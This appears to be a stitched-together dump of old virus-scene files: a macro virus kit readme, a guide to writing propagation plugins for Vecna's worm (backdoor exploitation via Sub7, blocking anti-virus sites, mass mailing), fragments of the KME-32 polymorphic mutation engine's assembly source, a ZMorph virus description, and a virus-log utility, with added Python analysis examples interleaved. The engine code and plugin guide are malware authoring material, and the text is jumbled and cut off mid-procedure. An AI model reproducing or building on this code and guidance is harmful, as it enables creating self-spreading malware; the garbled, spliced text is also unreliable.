http://www.sourceofkaos.com/homes/rajaat
Hint
~~~~
You might want to print out this help, which you can simply do by
redirecting the output, like: RRRACC --help > lpt1.
The WalruS Macro Virus Generator (WMVG)
The WalruS Macro Virus Generator Is An Easy-To-Use Virus Creation Kit For Word 97/2K. WMVG Is
AutoRun When The Document WMVG.doc Is Opened In Word.
In Addition There Are Text Boxes For Virus Author, Virus Name And Virus Comments (Not
Critical).
Every Option Has An Associated Help Button Providing A Help Message Box.
In Addition To Making Viruses WMVG Also Has An Extras Screen. Here There Are The Following
Options.
Scattered Throughout The WMVG Are Secret And Hidden Bits Of Information (Just For Fun).
In Future WMVG Will Be Updated To Include More And Different User Options.
WMVG Was Designed, Written And Tested On Word 2K. If You Spot A Bug Of Any Kind Please
Inform Me Below. Please
WMVG Fonts Are Comic Sans MS, Which Is Part Of The Office Installation. Should The WMVG Text
Look Incorrect Then Ensure That The Font Is Present In The C:\Windows\Fonts Folder. If It Is
Not Then The Font Is Provided With WMVG In The Folder Labelled Font.
WalruS@Z.com
http://www.WalruS.8k.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOWWORKS.TXT]ÄÄÄ
HOW TO WRITE YOUR OWN MUAZZIN
Muazzins receive control at their first byte, and can respond to the following
requests, passed in the appropriate structure:
MT_PROCESSDROPPER - called with the buffer and its current size as parameters;
this is the place to apply polymorphism to the dropper,
change the icon, and do everything else that affects the
form of the PE EXE dropper, which is the travelling form
of the virus.
MT_BLOCKIP - called with the IP address and the port the user is about
to connect to; it has several uses. It can block the IPs
of AV sites on the internet, save the SMTP and NNTP
servers the user uses, scan for open machines on that
network, etc...
MT_BREED - called at each full moon; this is the time for the muazzin
to send all the muazzins installed on the current system
to places where other muazzins, using MT_BLOOM, can
retrieve them. Posting to Usenet, sending e-mails, etc.
should be done here.
Notice that a single muazzin can respond to more than one type of call. It is
a good idea to make them work together: a muazzin that generates texts about
Pokemon in MT_GENTEXT can also change the icon in MT_PROCESSDROPPER. A muazzin
that scans for the Back Orifice backdoor at each MT_BLOCKIP and uploads itself
there should also process MT_APP, because the dropper, which it will need in
order to upload to the backdoor, isn't passed in calls to MT_BLOCKIP. Etc...
Also notice that these rules aren't written in stone: nothing forbids you, in
a dynamic system such as IRC, from using MT_BLOOM both to receive and to send
muazzins, or the like.
Once you have written your own muazzin, you should encrypt and sign it with
the included utility, and test it a lot. The key included in this release
isn't the key that the virus carries, so don't expect it to work with "in the
wild" samples. If you think that other infected machines need your muazzin,
contact me for a signature.
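An added example that is neither the virus's nor the signing utility's code, written to show what 'encrypt and sign it with the included utility' means for the host side: it carries only a public key, refuses any plugin image whose signature does not verify under that key, and then delivers requests only to plugins that declared that request type. The numeric request-type values, the toy RSA keys (textbook, unpadded, ~60-bit moduli, for illustration only), the plugin image format and the plugin behaviours are all assumptions of this example; encryption of the plugin body is left out.

```python
import hashlib

# Request types named on the page; the numeric values are an assumption here
MT_PROCESSDROPPER, MT_BLOCKIP, MT_BREED, MT_BLOOM, MT_GENTEXT, MT_APP = range(6)

def make_keypair(p, q, e=65537):
    """Toy textbook RSA: (public, private). Tiny modulus and no padding, demo only."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (e, n), (pow(e, -1, phi), n)

def _digest(image, n):
    return int.from_bytes(hashlib.sha256(image).digest(), 'big') % n

def sign(image, priv):
    d, n = priv
    return pow(_digest(image, n), d, n)

def verify(image, sig, pub):
    e, n = pub
    return pow(sig, e, n) == _digest(image, n)

def plugin_image(name, types):
    """The bytes that get signed: the plugin's name plus the request types it answers."""
    return (name + ':' + ','.join(str(t) for t in sorted(types))).encode()

class Host:
    """Stand-in for the virus: holds a public key only, loads what verifies under it."""

    def __init__(self, pub):
        self.pub, self.plugins = pub, []

    def load(self, name, types, handler, sig):
        if not verify(plugin_image(name, types), sig, self.pub):
            return False                      # other key, or image tampered with: refused
        self.plugins.append((frozenset(types), handler))
        return True

    def call(self, mtype, arg):
        """Deliver one request to every plugin that handles it; one plugin may handle several."""
        return [handler(mtype, arg) for types, handler in self.plugins if mtype in types]

# Two illustrative plugins, as the text suggests: one answering two request types
def icon_and_text(mtype, arg):
    if mtype == MT_PROCESSDROPPER:
        return arg + b'<icon>'                # arg: dropper buffer, returned modified
    return 'pokemon text for ' + arg          # MT_GENTEXT; arg: recipient

def server_saver(mtype, arg):
    host, port = arg                          # MT_BLOCKIP: (ip, port) of an outgoing connection
    return 'smtp' if port == 25 else ('nntp' if port == 119 else None)

# Constructed keys: the one shipped with the kit and the one the virus carries
KIT_PUB, KIT_PRIV = make_keypair(1000000007, 998244353)
WILD_PUB, WILD_PRIV = make_keypair(1000000009, 1000000021)

def demo():
    """A plugin signed with the kit key loads into a kit-keyed host, not into a wild one."""
    types = {MT_PROCESSDROPPER, MT_GENTEXT}
    sig = sign(plugin_image('icon_and_text', types), KIT_PRIV)
    return (Host(KIT_PUB).load('icon_and_text', types, icon_and_text, sig),
            Host(WILD_PUB).load('icon_and_text', types, icon_and_text, sig))

if __name__ == '__main__':
    print('kit host accepts, wild host accepts:', demo())
```

The design point is the one the text makes in passing: because the host only ever holds the public half, anyone with the kit can build and test plugins, but only the holder of the wild private key can make one that infected machines will run.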
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[HOWWORKS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MUAZZINS.TXT]ÄÄÄ
SAMPLE MUAZZINS INCLUDED:
/EXE - Infects DOS EXE files. Infected files check for a Win32 OS and
write and run the dropper if positive. Recursive search.
/HLP - Searches for and infects HLP files with Babylonia's HLP infection
scheme. Recursive search.
/RARZIP - Searches for ZIP and RAR files, using Z0MBiE's library, and
adds droppers to them. Recursive search.
/SUB7 - Scans the class C subnet of each contacted host for the Sub7
backdoor, and then uploads/runs/deletes the virus dropper on
such a system. Bypasses the Sub7 server password. For doing
the manual work ;)
SERVER.S - Saves the user's default SMTP and NNTP servers to the registry,
and returns them on request from the virus.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MUAZZINS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GREETS.TXT]ÄÄÄ
If I can see so far, it is because I am standing on the shoulders of giants...
This virus would not exist if it were not for the extreme help and support of
several people who helped in all phases of the development. Greetz go to
Spanska and Mister Sandman, the intellectual co-authors of this virus, and to
Z0MBiE, the master coder, for all kinds of magic routines. Finally, the
Brazilian crew, my team, with Kamaileon, NBK, Alevirus and Nimbus, who,
besides the testing and the help with several muazzins, gave me support and
made this creation known worldwide. ;-)
Greets also go to VirusBuster and Gigabyte, who always gave me emotional
support in my dark days, and to urgo32, who tried to teach me math.
Vecna, 2000
ps: to contact me, contact somebody named here, and they will make your name
and email reach me.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[GREETS.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FILE_ID.DIZ]ÄÄÄ
KME-32 v3.00 - Kewl Mutation Engine
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- easy to use
- compatible with any 32-bit platform (Win9X/WinNT, ring0/ring3)
- stack algorithm, allowing data compression
- highly configurable
- commented sources included
- full russian/english documentation
- examples
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[FILE_ID.DIZ]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ZMORPH.TXT]ÄÄÄ
Win95.ZMorph
------------------------------------------------------------------------
These are Win9x viruses infecting PE EXE files (Windows executables). The
viruses have a significant feature: a polymorphic engine that is used to hide
their code in infected files. This polymorphic engine modifies the virus code
so that no single continuous piece of virus code, in either encrypted or
"clear" form, is stored in an infected file. Instead of the "standard" method
of appending the virus code to the file as a continuous sequence of
[encrypted] code instructions, data areas, etc., the virus addition to
infected files looks like a chain of routines of random size, stored at
random positions at the end of the file; each routine passes control to the
next one, and all these routines are polymorphic:
[Diagram: the infected file, followed by the virus's routines of random size
scattered at random positions at the end of the file, each routine jumping to
the next one along the chain]
Because of this method of storing the virus code while infecting, the file
length grows by large amounts, up to about 30 KB. The size of the virus
addition to the file may be approximated as the "real virus" size multiplied
by six (in the case of the 5200-byte virus the victim file's size grows by
about 32 KB).
ZMorph.2784
This is a memory-resident Win9x virus. It switches its code to system driver
mode (Ring0), allocates a block of driver memory, copies itself there and
hooks two events: reads from port 8888h (used as an "Are-you-here" call to
detect an already-installed TSR copy of the virus) and the IFS API (file
access functions). The virus then returns control to the host file. The TSR
copy of the virus is then active as a VxD system driver, intercepts file
access functions and infects PE EXE files that are accessed.
The virus does not manifest itself in any way. It contains the text:
KME.Z0MBiE-4.b
ZMorph.5200
This version of the virus can be found in two variants: as an infected PE EXE
file, and as a virus "installer", the RUNDLL16.EXE file in the Windows system
directory.
The virus does not perform any harmful action except scanning Windows memory
for AVP Monitor and some other Windows resident anti-virus protection, and
disabling it by patching the monitor's code.
z0mbie.cjb.net
When an infected file is executed, the virus's polymorphic code gets control,
restores the original virus code onto the stack and jumps there, to the virus
installation routine. The installation routine gets the addresses of the
Windows functions it needs by scanning the KERNEL32.DLL image in Windows
memory (this is usual for most Win32 viruses) and performs two actions: it
installs the virus code into the Windows system directory, and leaves a
resident copy of the virus in Windows memory.
Ring0 component
To install itself memory-resident the virus switches its code to system
driver mode (Ring0), allocates a block of driver memory, copies itself there
and hooks two events: reads from port 8889h (used as the "Are-you-here" call
to detect an already-installed TSR copy of the vir
us) and the IFS API (file access functions). The virus then returns control
to the host file, and the TSR copy of the virus is then active as a VxD
system driver, intercepts file access functions and infects PE EXE files
that are accessed.
RUNDLL16 component
While installing its copy in the Windows system directory the virus creates
the RUNDLL16.EXE file there, writes its image in PE EXE form to this file,
and spawns it. RUNDLL16.EXE registers itself in the system as a service
process (invisible task), and registers its file (RUNDLL16.EXE) as an
auto-run file. To do that the virus creates the registry key:
The virus process then sleeps for several minutes, then scans the
subdirectory trees on all fixed drives from C: to Z:, "touches" the EXE files
there, and as a result forces the Ring0 component to infect them.
Infection
While infecting a file the virus parses its internal PE format, increases the
size of the last section, runs its polymorphic engine and writes the result
to the end of the file. The virus then modifies the necessary PE header
fields, including the program entry point.
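Added example (not part of the description above, and not the virus's code): the infection steps just listed leave a measurable trace, an entry point that lies inside the last section, which has been grown and usually made executable. The Python below builds two constructed minimal PE32 headers, one clean and one with the last section enlarged and the entry point moved into it, and parses them back to test for that. It is a heuristic only: linkers and packers also place entry points in a last section, so a hit marks a file for closer analysis rather than proving infection.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def build_pe(entry_rva, sections):
    """Constructed minimal PE32 image (headers only, no section bodies).

    sections: [(name, virtual_address, virtual_size, raw_ptr, raw_size, flags)]
    """
    dos = b'MZ' + bytes(0x3c - 2) + struct.pack('<I', 0x40)      # e_lfanew = 0x40
    coff = struct.pack('<HHIIIHH', 0x14c, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into('<H', opt, 0, 0x10b)                         # PE32 magic
    struct.pack_into('<I', opt, 16, entry_rva)                    # AddressOfEntryPoint
    table = b''.join(
        struct.pack('<8sIIIIIIHHI', name.encode().ljust(8, b'\0'),
                    vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, flags)
        for name, va, vsize, raw_ptr, raw_size, flags in sections)
    return dos + b'PE\0\0' + coff + bytes(opt) + table

def parse_pe(data):
    """Entry point RVA and section table of a PE32/PE32+ image."""
    if data[:2] != b'MZ':
        raise ValueError('no MZ header')
    pe = struct.unpack_from('<I', data, 0x3c)[0]
    if data[pe:pe + 4] != b'PE\0\0':
        raise ValueError('no PE signature')
    nsections = struct.unpack_from('<H', data, pe + 6)[0]
    opt_size = struct.unpack_from('<H', data, pe + 20)[0]
    entry = struct.unpack_from('<I', data, pe + 24 + 16)[0]
    table = pe + 24 + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            '<8sIIIIIIHHI', data, table + 40 * i)
        sections.append({'name': name.rstrip(b'\0').decode('ascii', 'replace'),
                         'va': va, 'vsize': vsize, 'raw_ptr': raw_ptr,
                         'raw_size': raw_size, 'flags': flags})
    return entry, sections

def scan_entry_point(data):
    """Which section holds the entry point, and whether that is a grown last section."""
    entry, sections = parse_pe(data)
    if not sections:
        raise ValueError('no sections')
    holder = next((s for s in sections
                   if s['va'] <= entry < s['va'] + max(s['vsize'], s['raw_size'])), None)
    last = sections[-1]
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return {'entry': entry,
            'section': holder['name'] if holder else None,
            'ep_in_last_section': holder is last,
            'last_section_wx': last['flags'] & wx == wx}

# Constructed samples: a plain two-section image, and the same image after the
# last section has been grown, made executable and given the entry point
TEXT = ('.text', 0x1000, 0x1000, 0x400, 0x1000, 0x60000020)
CLEAN = build_pe(0x1100, [TEXT, ('.data', 0x2000, 0x1000, 0x1400, 0x1000, 0xC0000040)])
INFECTED = build_pe(0x9F00, [TEXT, ('.data', 0x2000, 0x9000, 0x1400, 0x9000, 0xE0000040)])

if __name__ == '__main__':
    for label, image in (('clean', CLEAN), ('infected', INFECTED)):
        print(label, scan_entry_point(image))
```

On real samples one would also compare the section's size against the original and look at the bytes at the entry point, since the description says the chain of polymorphic routines begins there.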
kme_start:
; local variables
local save_esp:DWORD
pusha
mov in_subroutine, cl
mov p_count, ecx
mov fpuinit, cl
mov fpustack, cl
cmp initregptr, 0
je @@ir_done
xor ebx, ebx
@@ir_cycle: bt regavail, ebx
jnc @@ir_cont
mov edx, initregptr
mov edx, [edx+ebx*4]
cmp edx, -1
je @@ir_cont
mov em_reg[ebx*4], edx
bts reginit, ebx
@@ir_cont: inc ebx
cmp bl, 8
jb @@ir_cycle
@@ir_done:
; error handler
@@error3: ; int 3
@@error2: ; int 3
@@error1: ; int 3
@@error: mov esp, save_esp ; rest. ESP (if call from sub)
stc ; CF=1 - an error occured
jmp @@error_exit
; ---------------------------------------------------------------------------
; push 1 register
; (indexes stored in regbuf, count in ECX)
; ===========================================================================
; "epilog" code --
; -- load regs and JMP ESP in perverted form
cmp regused, 0
jne @@error1
mov eax, 20
call @@multi_garbage
jmp @@1ornot
call @@rnd_zf
jz @@skip_xchg
bts regavail, ecx ; free reg1
btr regavail, ebx
btr reginit, ebx
xchg ecx, ebx ; invert register usage
@@skip_xchg:
call @@rnd_zf
jz @@jmp
mov eax, 20
call @@multi_garbage
call @@epilog_regs
call @@eip
mov al, 0c3h ;ret
stosb
jmp @@lwo
retn ; @@epilog
call @@poly_cmd
call @@poly_cmd
@@er_ret: retn
; ===========================================================================
@@gen_value:
; use XOR if noone specified
testcmd CMD_XOR+CMD_ADD+CMD_SUB+CMD_AND+CMD_OR, @@rdef
jz @@r0 ; dispatch
dec eax
jz @@r1
@@rt: retn
or em_reg[ebx*4], edx
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
; ---------------------------------------------------------------------------
push ebx
mov ebx, eax
call @@rnd_zf
jz @@init_pushpop
@@reg_init_retn: retn
call @@eip
lea eax, [ebx+58h]
stosb
jmp @@init_done
; ---------------------------------------------------------------------------
; ===========================================================================
retn
; ---------------------------------------------------------------------------
@@eip_do1: pushad
jmp @@eip_do
@@eip: pusha
@@eip_do:
; well, here we MUST select new location, or die
@@poly_cmd: pusha
IFNDEF LITE
mov eax, cmdavail ; no avail cmds?
or eax, cmdavail2
jz @@poly_cmd_exit ; --exit
ENDIF
@@poly_cmd_restart:
mov eax, 55
call @@rnd_eax ; select random command index
; dispatch
or eax, eax
jz @@x_not
dec eax
jz @@x_neg
dec eax
jz @@x_inc
dec eax
jz @@x_dec
dec eax
jz @@x_inc
dec eax
jz @@x_dec
dec eax
jz @@x_shl
dec eax
jz @@x_shr
dec eax
jz @@x_rol
dec eax
jz @@x_ror
dec eax
jz @@x_sar
dec eax
jz @@x_mov_c
dec eax
jz @@x_add_c
dec eax
jz @@x_sub_c
dec eax
jz @@x_mov_c
dec eax
jz @@x_add_c
dec eax
jz @@x_sub_c
dec eax
jz @@x_xor_c
dec eax
jz @@x_and_c
dec eax
jz @@x_or_c
dec eax
jz @@x_rol_c
dec eax
jz @@x_ror_c
dec eax ; r1
jz @@x_bswap
dec eax
jz @@x_mul
dec eax
jz @@x_imul
dec eax
jz @@x_div
dec eax
jz @@x_idiv
dec eax
jz @@x_fpu
dec eax
jz @@cmp_i_follow
dec eax
jz @@cmp_i_nofollow
dec eax
jz @@callsub
dec eax
jz @@subroutine
dec eax
jz @@x_bsr
dec eax
jz @@x_bsf
dec eax
jz @@x_xchg
dec eax
jz @@x_mov
dec eax
jz @@x_and
dec eax
jz @@x_or
dec eax
jz @@cmp_r_nofollow
dec eax
jz @@cmp_r_follow
dec eax
jz @@x_cycle
@@poly_cmd_exit: ; exit
mov [esp+0*4], edi ; pushad_edi
popa
retn
call @@eip
call @@rnd_zf
jz @@gen_sub
jmp @@gen_done
call @@eip
mov ax, 0F881h ; cmp r,result
or ah, REG1_8
stosw
mov eax, em_reg[REG1*4]
stosd
cmp eax, eax
call @@eip
mov ax, 850Fh ; jne
stosw
stosd
pop eax ; start-cycle: eip
sub eax, edi
mov [edi-4], eax
jmp @@poly_cmd_exit
; push params
jecxz @@skip_push_rnd
mov eax, 8
call @@rnd_eax
add al, 50h
stosb
loop @@push_rnd
@@skip_push_rnd:
; generate call
call @@eip
; now, push all the state related to output code flow generation
jmp @@s_done
call @@state_push
shl ecx, 2
push ecx ; params size, in BYTEs
; prolog
mov ebx, regavail
@@push_loop: call @@eip
bsf eax, ebx ; smart idea
jz @@push_done
btr ebx, eax
add al, 50h
stosb
jmp @@push_loop
@@push_done:
; body
mov eax, 50
call @@multi_garbage
call @@eip
; epilog
mov ebx, regavail ; pop mask
@@pop_loop: call @@eip
bsr eax, ebx
jz @@pop_done
btr ebx, eax
add al, 58h ;POP regs 1 at once
stosb
jmp @@pop_loop
@@pop_done:
; retn
call @@eip
call @@state_pop
jmp @@e_done
push regavail
jmp esi
pop regavail
jmp esi
cmp REG2, 4
jae @@poly_cmd_exit
call @@rnd_zf
jz @@use_xl
jmp @@stos_sxzx
@@stos_sxzx:
mov em_reg[REG1*4], ecx
stosw
jmp @@poly_cmd_exit
jmp @@pop
call @@rnd_zf
jz @@imm_d
jmp @@pop
call @@eip
lea eax, [REG1+58h]
stosb ;pop reg
jmp @@poly_cmd_exit
mov tempo, -1
jmp @@cmp_i
mov tempo, 0
@@cmp_i:
test REG1, REG1
jnz @@longcmp
flagsnz FLAG_NOSHORT, @@longcmp ; if skip short opcs
dec edi ;
cmp byte ptr [edi], 3Dh ; EAX ?
je @@longcmp ;
inc edi ;
jmp @@outcond
@@useit: stosd
jmp @@outcond
mov tempo, -1
jmp @@cmp_r
mov tempo, 0
@@cmp_r:
push REG1 REG2 ; 'coz of @@swap
@@outcond:
call @@eip
seto jxxcond[0]
setb jxxcond[2]
sete jxxcond[4]
setbe jxxcond[6]
sets jxxcond[8]
setp jxxcond[10]
setl jxxcond[12]
setle jxxcond[14]
mov eax, 8
call @@rnd_eax
shl eax, 1
xor al, jxxcond[eax]
xor al, 70h
jmp @@poly_cmd_exit
@@short_dontfollow: stosb
call @@random_byte
stosb ;displacement(that dont get exec)
jmp @@poly_cmd_exit
jmp @@poly_cmd_exit
@@modrm: pusha
mov al, 0C0h
shl REG2_8, 3
or al, REG2_8
or al, REG1_8
stosb
popa
inc edi
retn
@@stosw_modrm_stosbX: stosw
call @@modrm
jmp @@stosbX
@@stosb_modrm_stosd: stosb
call @@modrm
jmp @@stosd
@@stos3or: stosw
shr eax, 16
or al, REG1_8
mov ah, XXX_8
stosw
jmp @@poly_cmd_exit
; ---------------------------------------------------------------------------
@@x_not: testcmd CMD_NOT, @@poly_cmd_restart
not em_reg[REG1*4] ; emul -- not r1
mov ax, 0d0f7h ; opcode
jmp @@orahR1_stosw
@@can_idiv: pusha
or ecx, ecx
jz @@idiv_err
jg @@g1
neg ecx
@@g1: or edx, edx
jge @@g2
neg edx
neg eax
sbb edx, 0
@@g2: xor esi, esi ; d
xor edi, edi ; m
mov bl, 64
@@divcycle: shl esi, 1 ; d <<= 1
jc @@idiv_err
shl eax, 1 ; x <<= 1
rcl edx, 1
rcl edi, 1 ; m = (m << 1) | x.bit[i]
jc @@cmpsub
cmp edi, ecx ; if (m >= y)
jb @@cmpsubok
@@cmpsub: sbb edi, ecx ; m -= y
or esi, 1 ; d |= 1
@@cmpsubok: dec bl
jnz @@divcycle
shl esi, 1
jc @@idiv_err
shl edi, 1
jc @@idiv_err
popa
retn
@@idiv_err: stc
popa
retn
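The @@can_idiv routine above decides, by long division on the emulated register values (em_reg), whether an idiv the engine is about to emit would raise a divide error when the generated code runs. As an added example that is not KME's code, here is the same decision in Python beside the exact x86 rule, so the difference is visible: the routine is conservative and also refuses the one legal quotient of exactly -2^31.

```python
def _signed(value, bits):
    """Reinterpret an unsigned register value of the given width as two's complement."""
    value &= (1 << bits) - 1
    return value - (1 << bits) if value >> (bits - 1) else value

def _divide(edx, eax, ecx):
    """Signed operands of 'idiv ecx' on EDX:EAX and the truncating quotient x86 forms."""
    dividend = _signed((edx << 32) | eax, 64)
    divisor = _signed(ecx, 32)
    quotient = abs(dividend) // abs(divisor)
    if (dividend < 0) != (divisor < 0):
        quotient = -quotient
    return dividend, divisor, quotient

def can_idiv(edx, eax, ecx):
    """Python twin of @@can_idiv: True only if the idiv cannot trap.

    Like the routine it mirrors it is conservative: the magnitude of the
    quotient has to fit in 31 bits, which also rejects the legal -2^31.
    """
    if ecx == 0:
        return False
    _, _, quotient = _divide(edx, eax, ecx)
    return abs(quotient) < (1 << 31)

def idiv_traps(edx, eax, ecx):
    """Exact x86 rule: #DE on a zero divisor or a quotient outside [-2^31, 2^31-1]."""
    if ecx == 0:
        return True
    _, _, quotient = _divide(edx, eax, ecx)
    return not -(1 << 31) <= quotient <= (1 << 31) - 1

def idiv(edx, eax, ecx):
    """Emulate 'idiv ecx': (eax, edx) = (quotient, remainder) as unsigned 32-bit
    values, the remainder carrying the dividend's sign as on x86."""
    if idiv_traps(edx, eax, ecx):
        raise ZeroDivisionError('#DE: idiv would trap')
    dividend, divisor, quotient = _divide(edx, eax, ecx)
    remainder = dividend - quotient * divisor
    return quotient & 0xFFFFFFFF, remainder & 0xFFFFFFFF

if __name__ == '__main__':
    for edx, eax, ecx in ((0, 10, 3), (1, 0, 1), (0xFFFFFFFF, 0x80000000, 1)):
        print(hex(edx), hex(eax), hex(ecx), 'KME ok:', can_idiv(edx, eax, ecx),
              'x86 traps:', idiv_traps(edx, eax, ecx))
```

The point for anyone writing or analysing such an engine: every instruction the generator emits is run against a register model first, so a division that would fault, or a shift that would destroy a value still needed, is never written out. The same model is what lets the engine know the final register contents it has to restore in the epilog.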
; ---------------------------------------------------------------------------
; real super-puper...
cmp fpuinit, 0
jne @@alredyinit
inc fpuinit
call @@poly_cmd
call @@eip
@@alredyinit:
lea eax, [REG2+50h] ; push reg2
stosb
push em_reg[REG2*4]
call @@poly_cmd
call @@eip
mov ax, 04DBh ; fild dword ptr [esp]
stosw
mov al, 24h
stosb
fild dword ptr [esp]
inc fpustack
call @@poly_cmd
call @@rnd_zf
jz @@cos
call @@eip
mov ax, 1CD9h ; fstp dword ptr [esp]
stosw
mov al, 24h
stosb
fstp dword ptr [esp]
dec fpustack
call @@poly_cmd
pop em_reg[REG1*4]
call @@eip
lea eax, [REG1+58h] ; pop reg1
stosb
jmp @@poly_cmd_exit
; ---------------------------------------------------------------------------
kme_main endp
kme_end:
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[KME32.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[KME32.INT]ÄÄÄ
; ===========================================================================
; KME-32 v3.00 Kewl Mutation Engine (c) 99-00 Z0MBiE, Vecna
; ===========================================================================
CMD2_ALL equ -1
uses
dos, crt, lgarray;
var
f : text;
newfile : text;
flag1 : boolean;
flag2 : boolean;
count : longint;
log_file : string;
tipo : string;
dic1 : dictionary;
dic2 : dictionary;
dic3 : dictionary;
dic4 : dictionary;
dic5 : dictionary;
dic6 : dictionary;
dic7 : dictionary;
dic8 : dictionary;
dic9 : dictionary;
dic10 : dictionary;
dic11 : dictionary;
dic12 : dictionary;
dic13 : dictionary;
i : integer;
log : text;
instring : string;
filename : string;
virusname : string;
test : longint;
parm1 : string;
parm2 : string;
parm3 : string;
last_bar : byte;
tmp_str : string;
TBuff : Pointer;
TBuffsize : LongInt;
temp_string : string;
space_position : byte;
procedure ShowHelp;
begin
writeln(' -b {s} <logname> Build new DAT file');
writeln(' -c {s} <logname> Compare someone elses log');
writeln(' -a {l} {s} <logname> Add new virii');
writeln(' -h {u} Count virii');
writeln;
halt;
end;
procedure call_buffer;
begin
tbuffsize:=Maxavail;
if tbuffsize > $fff0 then tbuffsize := $fff0;
getmem(tbuff,tbuffsize);
end;
procedure inicializa_diccionarios;
begin
dicAssign(dic1,'dict1');
dicRewrite(dic1,4000);
dicAssign(dic2,'dict2');
dicRewrite(dic2,4000);
dicAssign(dic3,'dict3');
dicRewrite(dic3,4000);
dicAssign(dic4,'dict4');
dicRewrite(dic4,4000);
dicAssign(dic5,'dict5');
dicRewrite(dic5,5000);
dicAssign(dic6,'dict6');
dicRewrite(dic6,5000);
dicAssign(dic7,'dict7');
dicRewrite(dic7,4000);
dicAssign(dic8,'dict8');
dicRewrite(dic8,4000);
dicAssign(dic9,'dict9');
dicRewrite(dic9,4000);
dicAssign(dic10,'dict10');
dicRewrite(dic10,4000);
dicAssign(dic11,'dict11');
dicRewrite(dic11,4000);
dicAssign(dic12,'dict12');
dicRewrite(dic12,4000);
dicAssign(dic13,'dict13');
dicRewrite(dic13,4000);
end;
procedure escribe_diccionario;
begin
if UpCase(virusname[1]) >= 'T' then
begin
if UpCase(virusname[1]) <= 'U' then dicWrite(dic8,
virusname,test)
else if UpCase(virusname[1]) = 'V' then dicWrite(dic9,
virusname,test)
else if UpCase(virusname[1]) = 'W' then dicWrite(dic6,
virusname,test)
else if UpCase(virusname[1]) <= 'Z' then dicWrite(dic10,
virusname,test)
else dicWrite(dic1,virusname,test);
end
else if UpCase(virusname[1]) >= 'M' then
begin
if UpCase(virusname[1]) = 'M' then dicWrite(dic13,
virusname,test)
else if UpCase(virusname[1]) <= 'O' then dicWrite(
dic4,virusname,test)
else if UpCase(virusname[1]) <= 'Q' then dicWrite(
dic5,virusname,test)
else if UpCase(virusname[1]) <= 'S' then dicWrite(
dic7,virusname,test);
end
else
begin
if UpCase(virusname[1]) <= 'B' then dicWrite(dic1,virusname,test)
else if UpCase(virusname[1]) <= 'F' then dicWrite(dic2,virusname,test)
else if UpCase(virusname[1]) <= 'H' then dicWrite(dic3,virusname,test)
else if UpCase(virusname[1]) <= 'J' then dicWrite(dic11,virusname,test)
else if UpCase(virusname[1]) <= 'L' then dicWrite(dic12,virusname,test);
end;
end;
procedure cierra_diccionarios;
begin
dicClose;
dicErase(dic1);
dicErase(dic2);
dicErase(dic3);
dicErase(dic4);
dicErase(dic5);
dicErase(dic6);
dicErase(dic7);
dicErase(dic8);
dicErase(dic9);
dicErase(dic10);
dicErase(dic11);
dicErase(dic12);
dicErase(dic13);
end;
procedure no_virii;
begin
writeln('No virii found to process!');
end;
procedure no_new_virii_found;
begin
writeln('No new virii found');
end;
procedure no_new_virii_added;
begin
writeln('No new virii added');
end;
procedure not_find_avp;
begin
writeln('Can not find AVP.DAT in current directory!');
end;
procedure not_find_fprot;
begin
